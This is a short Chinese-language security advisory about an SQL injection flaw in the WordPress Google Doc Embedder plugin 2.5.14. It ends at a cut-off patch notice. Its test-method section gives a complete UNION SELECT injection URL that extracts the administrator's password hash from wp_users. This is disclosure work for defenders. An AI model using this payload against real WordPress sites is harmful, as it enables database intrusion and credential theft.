发布日期:2014-11-11
更新日期:2014-11-27
受影响系统:
WordPress Google Doc Embedder 2.5.14
WordPress Google Doc Embedder
描述:
BUGTRAQ ID: 71304
Google Doc Embedder插件可将PDF、MS Office及其他文件类型嵌入到网页中。
Google Doc Embedder Plugin 2.5.14及其他版本在实现上存在sql注入漏洞,成功利用后可使攻击者执行未授权数据库操作。
<*来源:Kacper Szurek
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/wp-content/plugins/google-document-embedder/view.php?embedded=1&amp;gpid=0 UNION SELECT 1, 2, 3, CONCAT(CAST(CHAR(97, 58, 49, 58, 123, 115, 58, 54, 58, 34, 118, 119, 95, 99, 115, 115, 34, 59, 115, 58) as CHAR), LENGTH(user_pass), CAST(CHAR(58, 34) as CHAR), user_pass, CAST(CHAR(34, 59, 125) as CHAR)) FROM `wp_users` WHERE ID=1
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: